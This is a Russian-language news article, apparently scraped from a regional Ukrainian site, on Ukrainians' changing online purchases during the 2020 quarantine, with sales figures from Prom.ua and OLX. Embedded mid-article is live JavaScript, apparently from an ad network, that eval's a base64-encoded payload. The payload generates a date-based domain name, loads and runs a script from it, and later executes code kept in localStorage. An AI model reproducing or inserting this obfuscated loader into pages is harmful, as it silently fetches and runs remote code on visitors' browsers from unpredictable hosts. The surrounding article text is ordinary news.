Что украинцы чаще всего покупали в интернете на карантине

Связанный с эпидемией коронавируса карантин в Украине и вынужденное затворничество внесли слишком много изменений в привычный уклад жизни.

Поменялись и привычки покупателей, которые теперь вместо путевок и билетов покупают велосипеды, а доставка любой продукции стала едва ли не топ-запросом в обществе. Сайт «Сегодня» рассказывает, что чаще всего украинцы покупали в интернете.

Оказалось, что гораздо чаще украинцы стали покупать товары для отдыха на природе (складные стулья, палатки, рыболовные снасти, садовые столы, гамаки), но реже – заказывать портативные колонки, наушники, дорожные сумки и рюкзаки.

По данным маркетплейса Prom.ua этим летом почти в 4 раза вырос спрос на складные стулья и столы, а также скейтборды и роллерсерфы.

«В стране приобретает популярность внутренний туризм. Также многие переехали на дачу. В итоге онлайн покупают все для дачи, сада, рыбалки и походов или выездов на природу. Больше всего заказывают тенты и палатки. На них тратят около 1300 грн. Затем выбирают садовые или складные столы, стулья (760-880 грн), гамаки (400 грн) и поливочные шланги (410 грн). На удочки, спиннинги тратят около 590 грн, на рыболовные снасти — 450 грн, что в 2,5 раза больше, чем в прошлом году. По сравнению с прошлым годом, летом 2020-го украинцы тратят на 12-17% меньше на товары для дачи и отдыха», – говорит Лилия Овчинникова, руководитель пресс-службы Prom.ua.

Для детей заказывают батуты, скейтборды и роллерсерфы. В среднем на батуты тратят 5000 грн, а на скейтборды и роллерсерфы – 520 грн.

Технику покупают чуть меньше, но некоторые товары уверенно держатся в топе. В основном заказывают смарт-часы и фитнес-браслеты, а вот портативные колонки и наушники этим летом стали покупать реже. Так, если летом 2019 года на портале было 29 тыс. заказов наушников и гарнитур, то этим летом их всего 19900, а число заказов портативных колонок сократилось с 11300 до 8000. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Летом люди начали отмечать праздники. Из-за карантина свадебный сезон стартовал позже. Поэтому в интернете заказывали воздушные шары и композиции из них, а также свадебные аксессуары. Средний чек – 250 грн. Интересно, что количество заказов воздушных шаров за год выросло с 3500 до 5800, а вот свадебные аксессуары покупали реже – 4100 заказов в 2019 году и 3100 – летом 2020 года.

Руководитель департамента клиентского сервиса OLX в Украине и Центральной Азии Игорь Сыроватко говорит, что в июне-июле 2020 года наибольший интерес на платформе OLX у пользователей вызывают автозапчасти и мобильные телефоны. При этом спрос на эти товары за год увеличился на 49% и 22% соответственно.

«Вместе со спросом выросло и предложение. Объявлений с запчастями для транспорта стало больше почти на 43%. Телефонов же от продавцов в этом году +14%, или почти 36 тыс. объявлений. В рейтинг самых интересных товаров летом 2020 ворвались и велотовары. Предложение выросло на 47%, а спрос — на 69%. Среди объявлений, на которые спрос, наоборот, значительно снизился, ожидаемо оказались билеты, на которые откликнулись на 81% меньше, чем прошлым летом. Интерес пользователей некритично уменьшился к некоторым маркам автомобиля», — поясняет Сыроватко.

Об этом пишет «Сегодня».

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/chto-ukraintsy-chashhe-vsego-pokupali-v-internete-na-karantine/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top